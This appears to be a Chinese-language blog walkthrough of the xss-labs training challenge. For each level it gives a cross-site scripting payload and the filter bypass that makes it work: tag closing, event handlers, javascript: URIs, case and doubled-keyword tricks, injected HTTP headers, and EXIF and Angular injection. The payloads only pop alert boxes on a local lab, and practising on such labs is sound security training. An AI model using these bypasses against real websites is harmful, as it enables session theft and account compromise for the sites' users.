xsslabs通关

C1ay666

第一关：啥也没过滤

什么也没过滤。

payload:
<script>alert('xss')</script>
第二关：闭合标签绕过

闭合标签即可

payload:
"><script>alert('xss')</script><"
第三关：htmlspecialchars绕过

输入的内容被html实体化了，但htmlspecialchars默认配置是不过滤单引号的。只有设置了: quotestyle 选项为ENT_ QUOTES才过滤单引号。

payload:
'onmouseover='alert(1)
第四关：尖括号被过滤

输入的<>被替换为空,可以采用on事件代替

第五关：script,on标签被过滤
script和on标签都被加上了下划线，可以采用a标签进行绕过

payload:
"><a href="javascript:alert(/xss/)">alert</a><"

第六关：常用标签均被加上下划线

常用标签都被加了下划线，可以采用大小写进行绕过

payload:
"><a HREF=javascript:alert(1)><"
第七关：常用标签均被替换为空

常用标签被替换为空，可以采用双写进行绕过

payload:
"><scriscriptpt>alert('xss')</scriscriptpt><"
第八关：添加友链

该关是要添加一个友情连接，可以使用javascript:alert(1)进行html实体化绕过

在线转码链接：https://www.qqxiuzi.cn/bianma/zifushiti.php

payload:
javascript:alert(/xss/)
第九关：添加带http://的友链

对设置的友情链接有要求，链接中必须要含有http://

payload:
javascript:alert('http://')
第十关：输出标签被隐藏

输出的标签被隐藏了，可以通过修改type属性进行绕过

payload:
http://127.0.0.1/xsslabs/level10.php?keyword=1&t_sort="onmouseover="alert(1)
第十一关：referer头部被隐藏

本关会接收http请求头部中的referer的值，并在隐藏标签t_ref中输出，通过burpsuite抓包修改referer的值并修改隐藏标签的类型即可

payload:
在请求头中加入：Referer:"onmouseover="alert(1)
在修改隐藏标签t_ref的type属性即可

第十二关：ua头部被隐藏

与十一关类似，通过burpsuite修改ua的值即可

payload:
在请求头中修改：User-Agent: "onmouseover="alert(1)
在修改隐藏标签t_ref的type属性即可

第十三关：cookie头部被隐藏

与十一关类似，通过burpsuite修改cookie中user的值即可

payload:
在请求头中修改：Cookie: user="onmouseover="alert(1);
在修改隐藏标签t_ref的type属性即可

第十四关：Exif注入

参考链接：https://blog.csdn.net/qq_32393893/article/details/104814749

复现流程：

1.下载chrome Exif Viewer插件

2.在图片exif信息中写入xss payload

3.通过浏览器进行访问即可触发XSS漏洞

第十五关：angular.min.js注入

本关加载了angular.min.js的js文件，并使用了ng-include类，该类用于加载外部的html文件，因此可以通过加载前机关的html文件触发xss

payload:
src= 'level10.php?t_sort=" onclick=alert(/xss/)  type="button" >< '
第十六关：script，空格被过滤

本关过滤了script以及空格，通过%0a,%0d代替即可

payload:
keyword=<img%0asrc=x%0aonerror=alert(1)>
第十七关：双引号，尖括号被过滤

本关过滤了双引号和尖括号，可以通过onclick和onmouseover绕过

payload:
arg01=a&arg02=b%0aonmouseover=alert(1)
第十八关及以后和十七关类似

大佬带带

不错